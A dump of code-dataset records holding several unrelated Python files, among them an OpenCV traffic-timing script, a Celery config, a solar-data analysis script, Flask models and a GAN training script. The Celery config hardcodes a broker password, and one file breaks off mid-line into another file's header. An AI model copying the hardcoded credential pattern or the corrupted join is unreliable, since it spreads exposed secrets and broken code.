cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 15):\r\n st = 20\r\n elif (sim > 14.5):\r\n st = 40\r\n else:\r\n st = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while st > 0:\r\n sheet.update_cell(p, 3, st)\r\n time.sleep(3)\r\n st = st - 3\r\n\r\n ####-----------East\r\n p = p + 1\r\n sheet.update_cell(1, 2, 3)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(3, 3, 20)\r\n sheet.update_cell(4, 3, 20)\r\n edge = cv.imread('ERef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'East/EStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 18.9):\r\n et = 30\r\n elif (sim > 18.4):\r\n et = 40\r\n else:\r\n et = 20\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while et > 0:\r\n sheet.update_cell(p, 3, et)\r\n time.sleep(3)\r\n et = et - 3\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"GLOSA/Sys@Int2.py","file_name":"Sys@Int2.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273817275","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module provides CFMM with the configuration required to use Celery. \n\"\"\"\n\nfrom celery.schedules import crontab\nfrom kombu import Exchange, Queue\n\nclass CeleryConfig(object):\n \"\"\"\n The default CFMM's configuration of Celery.\n \"\"\"\n\n # Timezone\n CELERY_ENABLE_UTC = True\n\n # Broker\n exchange_cfmm = Exchange(\"cfmm\", type=\"direct\")\n\n BROKER_CONNECTION_MAX_RETRIES = 10\n BROKER_CONNECTION_RETRY = True\n BROKER_CONNECTION_TIMEOUT = 3\n BROKER_URL = \"amqp://jascha:ruBwYrCM0BvPi300U1L9xocb@localhost:5672/cfmm\" # RabbitMQ\n BROKER_USE_SSL = False\n CELERY_ACCEPT_CONTENT = ['json', 'pickle']\n CELERY_ACKS_LATE = True\n CELERY_CREATE_MISSING_QUEUES = False\n CELERY_DEFAULT_EXCHANGE = exchange_cfmm\n CELERY_DEFAULT_EXCHANGE_TYPE = \"direct\"\n CELERY_DEFAULT_ROUTING_KEY = \"bitbucket\"\n CELERY_DEFAULT_QUEUE = \"bitbucket\"\n CELERY_INCLUDE = [\n \"cfmm.base\"\n ]\n CELERY_QUEUES = (\n Queue(\"bitbucket\", exchange_cfmm, routing_key=\"bitbucket\"),\n Queue(\"googlebooks\", exchange_cfmm, routing_key=\"cfmm.base\"),\n )\n CELERY_TASK_PUBLISH_RETRY = True\n CELERY_TASK_SERIALIZER = \"pickle\"\n CELERYD_USER=\"jascha\"\n CELERYD_GROUP=\"jascha\"\n CELERYD_TASK_SOFT_TIME_LIMIT = 300\n CELERYD_TASK_TIME_LIMIT = 600\n CELERY_TRACK_STARTED = True\n\n # Results\n CELERY_RESULT_BACKEND = \"redis://localhost:6379/0\" # Redis\n CELERY_RESULT_EXCHANGE = \"cfmm_results\"\n CELERY_RESULT_EXCHANGE_TYPE = \"direct\"\n CELERY_RESULT_PERSISTENT = False\n CELERY_RESULT_SERIALIZER = \"pickle\"\n CELERY_TASK_RESULT_EXPIRES = 600 # 10 minutes","sub_path":"cfmm/celeryapp/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"89528786","text":"import sys,csv\n\n# Convert loose format vaccination data csv from MSOA tab of weekly vaccination data from https://www.england.nhs.uk/statistics/statistical-work-areas/covid-19-vaccinations/ to a simple standard csv\n\n# \"Under xx\", \"xx-yy\", \"xx+\"\ndef parseagerange(x):\n if x[:6]==\"Under \": return \"0-%d\"%int(x[6:])\n if '-' in x: 
y=x.split('-');return \"%d-%d\"%(int(y[0]),int(y[1])+1)\n if x[-1:]=='+': return \"%d-150\"%int(x[:-1])\n return None\n\ndef flattennumber(x): return int(x.replace(',',''))\n\nreader=csv.reader(sys.stdin)\nwriter=csv.writer(sys.stdout)\nstart=False\noutrows=[]\nfor row in reader:\n if 'LTLA Code' in row: headings=row\n numageranges=sum(x[:6]=='Under ' for x in row)\n assert numageranges<3\n if numageranges>0:\n for (i,x) in enumerate(row):\n while i>=len(headings): headings.append('')\n if row[i]!='': headings[i]=row[i]\n cols=[]\n outputheadings=[]\n n=0\n for (i,x) in enumerate(headings):\n if x=='LTLA Code': outputheadings.append(x);lcol=i;continue\n if x=='MSOA Code': outputheadings.append(x);mcol=i;continue\n a=parseagerange(x)\n if a!=None:\n if a[:2]=='0-': n+=1\n prefix=('D*' if numageranges==1 else 'D%d'%n)\n outputheadings.append(prefix+'.'+a)\n cols.append(i)\n writer.writerow(outputheadings)\n start=True\n continue\n if start and row[lcol][:1]=='E':\n outrows.append([row[lcol],row[mcol]]+[flattennumber(row[i]) for i in cols])\noutrows.sort()\nfor row in outrows:\n writer.writerow(row)\n","sub_path":"VOCgrowth/convvaxdata_msoa.py","file_name":"convvaxdata_msoa.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397682495","text":"import sys\nimport struct\nimport binascii\n\nclass Counter():\n\tTOTAL_LINES = 0x77\n\tCODE_FILEPOINTER = None\n\n\tdef init(self):\n\t\tf = open(\"./code\", \"rb\")\n\t\tself.CODE_FILEPOINTER = f.read()\n\t\tself.CODE_FILEPOINTER = self.CODE_FILEPOINTER[4:]\n\t\t\n\tdef toDWord(self, code_buffer):\n\t\treturn struct.unpack(\">>>>> #\r\n# #\r\n# the name of the program is entered in the command line with #\r\n# the data file to be used. A typical invocation of #\r\n# the program would be: #\r\n# python3 solar.py generation.dat #\r\n# #\r\n# #\r\n# #\r\n# #\r\n# #\r\n# AUTHOR #\r\n# Registration number 0000000 # \r\n# I hereby certify that this program is entirely my own work. 
#\r\n###########################################################################\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART 0 \"\"\"\r\n\"\"\" IMPORTING MODULES \"\"\"\r\n\"\"\" & \"\"\"\r\n\"\"\" READING DATA FROM FILE \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n# In this step the modules needed are imported.\r\n# math = in the standard deviation function, for square root calculation\r\n# pylab = for drawing graphics\r\n# sys = for reading the data file at the command line\r\nimport math \r\nimport pylab\r\nimport sys\r\n\r\n# In this part, the program reads a file which is given on the command line (for example: generation.dat)\r\n# If it cannot read the data file, it produces an error message about it.\r\n# It reads this file and assigns the data to an array (all_data)\r\n\r\n\r\nall_data=[]\r\ntry:\r\n    with open(sys.argv[1], \"r\") as f:\r\n        all_data=f.readlines()\r\nexcept:\r\n    print (\" could not read any input\")\r\n    exit(1)\r\n\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART I \"\"\"\r\n\"\"\" FUNCTIONS \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# this function returns an ordinal number when it takes a number.\r\n# for example: when it takes 101, it returns 101st (11, 12 and 13 correctly take \"th\")\r\n\r\ndef ordinal_number(x):\r\n    x = str(x)\r\n    or_num = \"\"\r\n    if x[-2:] in (\"11\", \"12\", \"13\"):\r\n        or_num = \"th\"\r\n    elif x[-1] == \"1\":\r\n        or_num = \"st\"\r\n    elif x[-1] == \"2\":\r\n        or_num = \"nd\"\r\n    elif x[-1] == \"3\":\r\n        or_num = \"rd\"\r\n    else:\r\n        or_num = \"th\"\r\n    or_num = x + or_num\r\n    return or_num\r\n\r\n    \r\n# this function is for sorting arrays.\r\n# When you send two arrays, the function sorts them by the first one\r\n# A simple exchange sort is used\r\ndef sorting (array_1,array_2):\r\n    \r\n    for i in range(0, len(array_1) - 1):\r\n        for j in range (i + 1 , len(array_1)):\r\n            if array_1[i] > array_1[j]:\r\n                array_1[i] , array_1[j] = array_1[j] , array_1[i]\r\n                array_2[i] , array_2[j] = array_2[j] , array_2[i]\r\n    return array_1 , array_2\r\n\r\n\r\n# This function calculates the standard deviation.\r\n# It works with an array and returns a float number (sd_con).\r\ndef st_dev (sd_vals):\r\n    \r\n    sd_ave = mean(sd_vals)\r\n    lng = len(sd_vals)\r\n    total = 0\r\n    \r\n    for i in range (0,lng):\r\n        total = total + (sd_ave - sd_vals[i]) ** 2\r\n    \r\n    sd_con = math.sqrt( 1 / (lng - 1) * total )\r\n    return sd_con\r\n\r\n\r\n# This function calculates the mean.\r\n# It works with an array and returns a float number.\r\ndef mean (vals):\r\n    total = 0\r\n    lng=len(vals)\r\n    for i in range (0,lng):\r\n        total = total + vals[i]\r\n    average = total / lng\r\n    return average\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART I \"\"\"\r\n\"\"\" In this section, the data in the data file is read and the data is classified. 
\"\"\"\r\n\"\"\" \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# variables to be used throughout the program are defined.\r\nexplanation = [] # this array contains explanations \r\ndays_array = [] # this array contains days\r\nvalue_f_meter = [] # this array contains the reading of the generation meter at the end of that day\r\namount_per_day = [] # this array contains the amount of electricity generated in a day\r\nnumbers = \"1234567890\" # this string contains the digits 0-9, it is used to determine if a line starts with a number.\r\n\r\n\r\n# In this part, first check whether the data coming from the file is an explanation or a numerical value.\r\n# If it is a numerical value, the program separates it into two parts:\r\n# 1- Day Number ( array name = days_array )\r\n# 2- The reading of the generation meter ( array name = value_f_meter )\r\n# These two values are held in the arrays at the same index number.\r\nfor i in all_data:\r\n    if i[0] not in numbers :\r\n        explanation += [i]\r\n    else:\r\n        space = i.find(\" \")\r\n        days_array += [i[0 :space]]\r\n        other = (i[space + 1:])\r\n        space = other.find(\" \")\r\n        if space == -1:\r\n            value_f_meter += [other]\r\n        else:\r\n            value_f_meter += [other[0:space]]\r\n\r\n# In this part the day numbers (days_array) are converted to integer,\r\n# the reading of the generation meter at the end of that day (value_f_meter) is converted to float\r\nfor i in range (0,len(days_array)) :\r\n    try:\r\n        days_array[i] = int(days_array[i])\r\n        value_f_meter[i] = float(value_f_meter[i])\r\n    except:\r\n        print (\"There is a problem in your data file\")\r\n        exit(1)\r\n    \r\n    \r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART II \"\"\"\r\n\"\"\" missing days are calculated \"\"\"\r\n\"\"\" the amount of electricity generated in every day is calculated \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# In this step, missing days are calculated\r\n# when the days are sorted, anomalies are detected and the total value is distributed over the lost days.\r\n# lost days and lost values are added to the end of the relevant arrays.\r\nfor i in range (0,len(days_array) - 1):\r\n    if days_array[i + 1]-days_array[i] > 1:\r\n        difference1 = (value_f_meter[i + 1]- value_f_meter[i]) / (days_array[i + 1] - days_array[i])\r\n        difference = difference1\r\n        for j in range (days_array[i] + 1,days_array[i + 1]):\r\n            days_array += [j]\r\n            value_f_meter += [value_f_meter[i] + difference]\r\n            difference = difference + difference1\r\n\r\n# using the sorting function, the lost days and values are settled into their places. 
\r\ndays_array,value_f_meter = sorting(days_array,value_f_meter)\r\n\r\n# the amount of electricity generated in each day is calculated\r\n# and held in an array (amount_per_day)\r\namount_per_day += [0]\r\nfor i in range (0,len(days_array) -1 ):\r\n    amount_per_day += [value_f_meter[i + 1] - value_f_meter[i]]\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART III \"\"\"\r\n\"\"\" the requested outputs are calculated and printed \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# the mean function is used to calculate the average.\r\nmean_per_day = mean(amount_per_day)\r\n# The mean amount generated per day is printed\r\nprint((\"The mean amount generated per day = %.2f\" %(mean_per_day)))\r\n\r\n\r\n# in this section, max() is used to find the maximum amount.\r\n# it searches for the maximum value in the amount of electricity generated per day (amount_per_day)\r\n# after finding the maximum value, it checks on which days it occurs and whether the value is repeated.\r\nmax_amount = max(amount_per_day)\r\nidx = -1\r\nstring_char = \"\"\r\nwhile True:\r\n    try:\r\n        idx = amount_per_day.index(max_amount, idx + 1)\r\n        ord_num = ordinal_number(str(days_array[idx]))\r\n        string_char = string_char + ord_num + \" day | \"\r\n    except ValueError:break\r\n\r\n    \r\n# The maximum amount is printed\r\nprint(\"The maximum amount = %.2f\" %(max_amount))\r\n\r\n# The maximum amount observed day(s) is printed\r\nprint( \"The maximum amount observed day(s) = %s\" %(string_char))\r\n\r\n\r\n# in this section, min() is used to find the minimum amount.\r\n# it searches for the minimum value in the amount of electricity generated per day (amount_per_day)\r\n# day 1 is skipped because it only holds the meter baseline of 0.\r\nmin_amount = min(amount_per_day[1:])\r\nidx = 0\r\nstring_char = \"\"\r\nwhile True:\r\n    try:\r\n        idx = amount_per_day.index(min_amount, idx + 1)\r\n        ord_num = ordinal_number(str(days_array[idx]))\r\n        string_char = string_char + ord_num + \" day | \"\r\n    except ValueError:break\r\n\r\n# The minimum amount is printed\r\nprint(\"The minimum amount = %.2f \" %(min_amount))\r\n# The minimum amount observed day(s) is printed\r\nprint( (\"The minimum amount observed day(s) = %s\" % (string_char)))\r\n\r\n\r\n\r\n\"\"\"#####################################################################################\"\"\"\r\n\"\"\" PART IV \"\"\"\r\n\"\"\" splitting the readings into 28-day chunks \"\"\"\r\n\"\"\" calculate the mean and standard deviation for each chunk \"\"\"\r\n\"\"\" graphicization \"\"\"\r\n\"\"\"#####################################################################################\"\"\"\r\n\r\n# variables to be used in the chunking process are defined.\r\na28_days_chunk = [] # a temporary variable to divide the days into 28-day chunks\r\nmean_of_chunks = [] # this array contains the mean of every 28-day chunk.\r\nsd_of_chunks = [] # this array contains the standard deviation of every 28-day chunk.\r\n\r\n\r\n# in this step, the values (days and amount of electricity generated) are split into 28-day chunks\r\n# the st_dev function is used to calculate the standard deviation of each chunk\r\n# the mean function is used to calculate the average of each chunk\r\nfor i in range (1, len(amount_per_day) + 1):\r\n    a28_days_chunk += [amount_per_day[i - 1]]\r\n    if i % 28 == 0:\r\n        mean_of_chunks += [mean(a28_days_chunk)]\r\n        sd_of_chunks += [st_dev(a28_days_chunk)]\r\n        a28_days_chunk = []\r\n\r\n# it makes a final chunk of the days left over (fewer than 28 days). 
\r\nif len(a28_days_chunk)!= 0:\r\n mean_of_chunks += [mean(a28_days_chunk)]\r\n sd_of_chunks += [st_dev(a28_days_chunk)]\r\n\r\n\r\n\r\n# this section includes the calculation of the values to be used in the graphic.\r\n# these values are:\r\n# @ the average of 28-day-chunks\r\n# @ the average of 28-day-chunks - standard deviation\r\n# @ the average of 28-day-chunks + standard deviation\r\n# @ an equation that fits the data \r\n########################################################################### \r\n# the equation used is: #\r\n# ________________________________________________ #\r\n# | | #\r\n# | n | #\r\n# | ∑ (7 * sin (( 579 / 100 ) * ( x + 2 )) + 9 ) | #\r\n# | 0 | #\r\n# |________________________________________________| #\r\n# #\r\n###########################################################################\r\nx = []\r\nmean_minus_sd = []\r\nmean_plus_sd = []\r\nfor i in range(0,len(mean_of_chunks)):\r\n mean_minus_sd += [mean_of_chunks[i] - sd_of_chunks[i]]\r\n mean_plus_sd += [mean_of_chunks[i] + sd_of_chunks[i]]\r\n x += [7 * math.sin(5.79 * ((i + 2))) + 9]\r\n\r\n\r\n\r\n\r\n##############################################\r\n########### graphicization #################\r\n##############################################\r\n \r\nfig = pylab.figure ()\r\nax = fig.add_subplot (111)\r\nax.grid (True)\r\nax.set_xlabel (\"28 Days Chunks\")\r\nax.set_ylabel (\"The Amount Of Electricity Generated\")\r\nax.set_title (\"ANALYSING SOLAR PANEL DATA\")\r\n\r\n\r\n# the plot of 28-day-chunks average \r\nax.plot (mean_of_chunks,color = 'red', linestyle = 'solid',\r\n marker = 'o',markerfacecolor = 'red', markersize = 3)\r\n\r\n# the plot of 28-day-chunks average - standard deviation\r\nax.plot (mean_minus_sd,color = 'black', linestyle = 'dashed',\r\n marker = 'o',markerfacecolor = 'black', markersize = 3)\r\n\r\n# the plot of 28-day-chunks average + standard deviation\r\nax.plot (mean_plus_sd,color = 'black', linestyle = 'dotted',\r\n marker = 'o',markerfacecolor = 'black', markersize = 3)\r\n\r\n# the plot of the quation that fits 28-day-chunks average \r\nax.plot (x,color = 'green', linestyle = 'solid',\r\n marker = 'o',markerfacecolor = 'black', markersize = 0)\r\n\r\n\r\n\r\npylab.show ()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"solar.py","file_name":"solar.py","file_ext":"py","file_size_in_byte":15468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"134921953","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] 单词接龙\n#\n\n# @lc code=start\nimport collections\n\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str,\n wordList: List[str]) -> int:\n #DFS会超时,用BFS\n #方法1:BFS\n wordList = set(wordList)\n if endWord not in wordList or not beginWord or not endWord or not wordList:\n return 0\n n = len(beginWord)\n all_combo_word = collections.defaultdict(list)\n for word in wordList:\n for i in range(n):\n all_combo_word[word[:i] + '*' + word[i + 1:]].append(word)\n q = collections.deque()\n q.append((beginWord, 1))\n visited = {beginWord: True}\n while q:\n word, level = q.popleft()\n for i in range(n):\n for nxt in all_combo_word[word[:i] + '*' + word[i + 1:]]:\n if nxt not in visited:\n if nxt == endWord:\n return level + 1\n visited[nxt] = True\n q.append((nxt, level + 1))\n return 0\n\n\n# @lc 
code=end\n","sub_path":"Week_04/127.单词接龙-BFS1.py","file_name":"127.单词接龙-BFS1.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280658471","text":"from src.common.database import Database\nimport uuid\nfrom flask import session\n#from src.models.invoices.invoice import Invoice\n#from src.models.invoices.invoice_item import Invoice_item\nfrom src.models.items.item_company import Item_company\nimport src.models.items.constants as ItemConstants\nfrom src.models.items.type import Type\n\n\nclass Item(object):\n def __init__(self, hsn, company_id, model_name, type_id, tax, price, _id=None):\n self.hsn = hsn\n self.company_id = Item_company.id_for_item(company_id)._id\n self.model_name = model_name\n self.type_id = Type.get_by_name_for_item(type_id)._id\n self.tax = tax\n self.price = price\n self._id = uuid.uuid4().hex if _id is None else _id\n\n def save_to_mongo(self):\n Database.update(ItemConstants.ITEM_COLLECTION,{\"_id\":self._id},self.json())\n\n\n\n def json(self):\n return {\n \"_id\" : self._id,\n \"hsn\" : self.hsn,\n \"company_id\" : self.company_id,\n \"model_name\" : self.model_name,\n \"type_id\" : self.type_id,\n \"tax\" : self.tax,\n \"price\" : self.price,\n }\n\n @classmethod\n def get_items(cls):\n if session['conditions'] != {}:\n x = session['conditions']\n session['conditions'] = {}\n return [cls(**elm) for elm in Database.find(ItemConstants.ITEM_COLLECTION, x)]\n else:\n return [cls(**elm) for elm in Database.find(ItemConstants.ITEM_COLLECTION,{})]\n\n @classmethod\n def get_by_name(cls,name):\n return cls(**Database.find_one(ItemConstants.ITEM_COLLECTION,{\"model_name\":name}))\n\n @classmethod\n def get_by_id(cls,id):\n return cls(**Database.find_one(ItemConstants.ITEM_COLLECTION,{\"_id\":id}))\n\n\n @staticmethod\n def get_data_for_list():\n json_datas = []\n items = Item.get_items()\n for item in items:\n item.company_id = Item_company.find_by_id(item.company_id)\n item.type_id = Type.get_by_id(item.type_id)\n x = \"\"\n\n json_data = {\n \"model_name\" : item.model_name,\n \"company\" : item.company_id.name,\n \"hsn\":item.hsn,\n \"item_type\":item.type_id.type_name,\n \"tax\":item.tax,\n \"price\": item.price,\n \"actions\" : x,\n }\n json_datas.append(json_data)\n #print(json_datas)\n return json_datas\n\n @staticmethod\n def count_items():\n return Database.count_documents(ItemConstants.ITEM_COLLECTION, {})\n\n\"\"\"\nHere delete is invoked from invoices\n\"\"\"\n\n# Database.initialize()\n# invoices = Item.get_items()\n# for invoice in invoices:\n# invoice.tax = float(invoice.tax)\n# invoice.price = float(invoice.price)\n# Database.update('items',{\"_id\" : invoice._id}, { \"$set\" : {\"tax\" : invoice.tax, \"price\" : invoice.price}})\n","sub_path":"src/models/items/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466902225","text":"from flask import Blueprint, flash, g, redirect, render_template, request, url_for\n\n#from werkzeug.exeptions import abort\nfrom app.db import get_db\n\nbp = Blueprint('protocolo', __name__)\n\n@bp.route('/protocolo')\ndef index():\n db, c = get_db()\n c.execute(\n 'SELECT * FROM protocolo WHERE 1'\n )\n protocolos= c.fetchall()\n\n return render_template('protocolo/index.html', protocolos = 
protocolos)","sub_path":"protocolo.py","file_name":"protocolo.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231619131","text":"import os\nimport ssl\nimport socket\nimport json\nimport subprocess\nimport time\n\ndef loadTestPlan(testPlanFilePath):\n with open(testPlanFilePath, 'r', encoding='utf-8') as f:\n testPlan = json.load(f)\n return testPlan\n\n\ndef doTest(testItem):\n # set default result\n result = dict()\n result['result'] = False\n result['message'] = ''\n # prepare options.json\n with open('options.json', 'r', encoding='utf-8') as f:\n optionsData = json.load(f)\n if testItem.get('useSSL', False):\n optionsData['usessl'] = True\n optionsData['standard_key_key'] = '/server.key'\n optionsData['standard_key_crt'] = '/server.crt'\n else:\n optionsData['usessl'] = False\n optionsData['standard_key_key'] = ''\n optionsData['standard_key_crt'] = ''\n optionsData['dataLogFile'] = '/datalog.json'\n optionsData['log_file'] = '/log.log'\n with open('options.json', 'w', encoding='utf-8') as f:\n json.dump(optionsData, f)\n try:\n # start pywebserviceemul\n emulProcess = subprocess.Popen(['python', '../pywebserviceemul.py', '-o', os.getcwd() + '/options.json'])\n # send test item query\n conn = socket.socket()\n if testItem.get('useSSL', False):\n wSock = ssl.wrap_socket(conn, ssl_version=ssl.PROTOCOL_TLS)\n else:\n wSock = conn\n wSock.connect((testItem['standard_server'], testItem['standard_port']))\n queryText = '' + testItem['method'] + ' ' + testItem['page'] + ' ' + testItem['format']\n queryText += '\\r\\n'\n for curHeaderKey, curHeaderValue in testItem['headers'].items():\n queryText += curHeaderKey + ': ' + curHeaderValue + '\\r'\n queryText += '\\n\\n'\n queryText += json.dumps(testItem['body'])\n wSock.send(queryText.encode())\n time.sleep(1)\n sdata = ''\n data = True\n while data:\n try:\n data = wSock.recv(1024)\n except socket.error:\n break\n sdata += data.decode()\n wSock.close()\n if sdata.find(testItem['answerText']) >= 0:\n result['result'] = True\n # stop pywebserviceemul\n emulProcess.kill()\n except Exception as errorObj:\n result['message'] = str(errorObj)\n #\n return result\n\n\ntestPlanData = loadTestPlan('testPlan.json')\nfor testItem in testPlanData:\n testResult = doTest(testItem)\n testResultText = '' + testItem['title'] + ' '\n if testResult['result']:\n testResultText = testResultText + 'passed'\n else:\n testResultText = testResultText + 'failed with message: ' + testResult['message']\n testResultText = testResultText\n print(testResultText)\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"478170519","text":"##! 
usr/bin/python3\n# %%\n\nimport config\nfrom src.model.cntdesc_model import define_cnt_encoder, ContentNet\nfrom src.model.stldesc_model import define_desc_encoder, StyleNet\nfrom src.model.gen_model import define_generator\nfrom src.support.loss_functions import pairWiseRankingLoss, MarginalAcc, triplet_loss\nfrom src.model.stldesc_model import define_desc_encoder, StyleNet, define_stl_encoder, define_stl_regressor, stl_encoder\n\n#from src.model.wavelet_gan_model import define_cnt_descriminator, define_gan, define_generator\n\nimport os \nimport logging\nimport time\nimport random\nfrom datetime import datetime\nfrom livelossplot import outputs\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom numpy import load, zeros, ones\nimport pathlib\nfrom numpy.random import randint\nfrom sklearn.utils import shuffle\nimport tensorflow_addons as tfa\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.initializers import RandomNormal\nfrom tensorflow.keras.callbacks import TensorBoard\nimport tensorflow.keras.layers.experimental.preprocessing as prep\nfrom tensorflow.keras.models import load_model\nfrom matplotlib import pyplot\nfrom tensorflow.python.autograph.pyct import transformer\nfrom livelossplot import PlotLosses\nfrom livelossplot.outputs import MatplotlibPlot\n#%%\n# set logger\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n#tensorboard logger\nlogdir = config.LOG_DIR+ \"/gen_\" + datetime.now().strftime(\"%Y%m%d-%H%M%S\")\ntensorboard_callback = TensorBoard(log_dir=logdir, histogram_freq=1, profile_batch=1)\nrun_opts = tf.compat.v1.RunOptions(report_tensor_allocations_upon_oom = True)\n\ndef SM_SSIMLoss(ref_img, gen_img):\n one = tf.cast(tf.broadcast_to(1, shape=ref_img.shape), dtype=tf.float32)\n two = tf.cast(tf.broadcast_to(2, shape=ref_img.shape), dtype=tf.float32)\n rescaled_ref_img = tf.abs(tf.divide(tf.add(one, ref_img), two))\n rescaled_gen_img = tf.abs(tf.divide(tf.add(one, gen_img), two))\n loss = tf.image.ssim_multiscale(ref_img, gen_img, max_val=2, filter_size=3)\n return tf.reduce_mean(loss)\n\ndef mixLoss(ref_img, gen_img):\n one = tf.cast(tf.broadcast_to(1, shape=ref_img.shape), dtype=tf.float32)\n two = tf.cast(tf.broadcast_to(2, shape=ref_img.shape), dtype=tf.float32)\n rescaled_ref_img = tf.abs(tf.divide(tf.add(one, ref_img), two))\n rescaled_gen_img = tf.abs(tf.divide(tf.add(one, gen_img), two))\n l1_loss = tf.norm(ref_img-gen_img, ord=1, axis=0)/ref_img.shape[0]\n ms_ssim_loss = tf.reduce_mean(tf.image.ssim_multiscale(rescaled_ref_img, rescaled_gen_img, max_val=1, filter_size=3))\n alpha = tf.cast(config.GEN_LOSS_ALPHA, dtype=tf.float32)\n total_loss = alpha*ms_ssim_loss + (1-alpha)*l1_loss\n return tf.cast(total_loss, dtype=tf.float32)\n\n\ndef process_img(img):\n img = tf.image.decode_jpeg(img, channels=3) \n img = tf.image.convert_image_dtype(img, tf.float32) \n return tf.image.resize(img, config.IMAGE_SIZE)\n\ndef process_path(file_path):\n img = tf.io.read_file(file_path)\n img = tf.image.decode_jpeg(img, channels=3)\n #print(fp)\n img = tf.image.convert_image_dtype(img, tf.float32)\n img = tf.image.resize(img, size=(128, 128))\n return img\n\ndef train_gen():\n lower, higher, root_style_path, root_cnt_path, n = 1, 1100, './data/data/styleU', './data/data/MSO/MSOCntImg', 2000\n idx = np.random.choice(range(lower, higher), n, replace=True)\n for i in idx:\n #i = random.randint(lower, higher)\n random_num = random.randint(1, stenc_df.shape[0])\n # random_bool = 
random.randint(0,1)\n # if random_bool:\n # if random_num == int(i):\n # random_num = random.randint(lower, higher)\n # else:\n # random_num = max(random.randint(1,10), int(i)-5)\n cnt_det = os.path.join(root_cnt_path, f'{i}.jpg')\n stl_det = stenc_df.loc[random_num, ['path', 'style_code']]\n\n # label = 0\n # if img1_det['style_code'] == img2_det['style_code']:\n # label = 1\n #print(os.path.join(root_path, img1_det['path']), os.path.join(root_path, img2_det['path']))\n try :\n cnt_img = process_path(cnt_det)\n stl_path = os.path.join(root_style_path, stl_det['path'])\n stl_img = process_path(stl_path)\n yield stl_img, cnt_img, stl_det['style_code']\n except:\n # print(e)\n print(f\"Error in file {cnt_det} | {stl_path}\")\n continue\n\n# image resize and rescale pipeline\nresize_and_rescale = tf.keras.Sequential([\n prep.Resizing(config.IMG_HEIGHT, config.IMG_WIDTH),\n prep.Normalization()\n])\n\ndef prepare(ds, shuffle=False):\n # ds = ds.map(lambda x: tf.py_function(process_path, [x], [tf.float32, tf.float32, tf.int32]),\n # num_parallel_calls=tf.data.AUTOTUNE)\n\n # ds = ds.map(lambda x1, x2, y: (process_path(x1), process_path(x2), y),\n # num_parallel_calls=tf.data.AUTOTUNE)\n\n ds = ds.map(lambda slt, cnt, y: (resize_and_rescale(slt), resize_and_rescale(cnt), y),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n ds = ds.cache()\n \n if shuffle:\n ds = ds.shuffle(1000)\n\n ds = ds.batch(16)\n return ds.prefetch(buffer_size=tf.data.AUTOTUNE)\n\n\n\n\ndef add_cnt_loss(dis_loss, gen_loss):\n return dis_loss + config.LAMBDAC*gen_loss\n\ndef add_style_loss(dis_loss, gen_loss):\n return dis_loss + config.LAMBDAS*gen_loss\n\ndef totalLoss(dss_loss, dsc_loss, gen_loss):\n gan_alpha = config.GAN_ALPHA\n gan_beta = config.GAN_BETA\n one = 1\n\n tot_loss = 0.5*dss_loss + 0.5*dsc_loss + gen_loss\n #tot_loss = gan_alpha*(gan_beta*dss_loss+(one-gan_beta)*dsc_loss)+(one-gan_alpha)*gen_loss\n return tf.cast(tot_loss, dtype=tf.float32)\n\n@tf.function\ndef train_step(cnt_in, style_in, stly):\n with tf.GradientTape() as gen_tape:\n gen_img = gen_model([cnt_in, style_in])\n cnt_vec, gen_vec = cnt_base_model(cnt_in), cnt_base_model(gen_img)\n stl_vec, gen_vec1 = 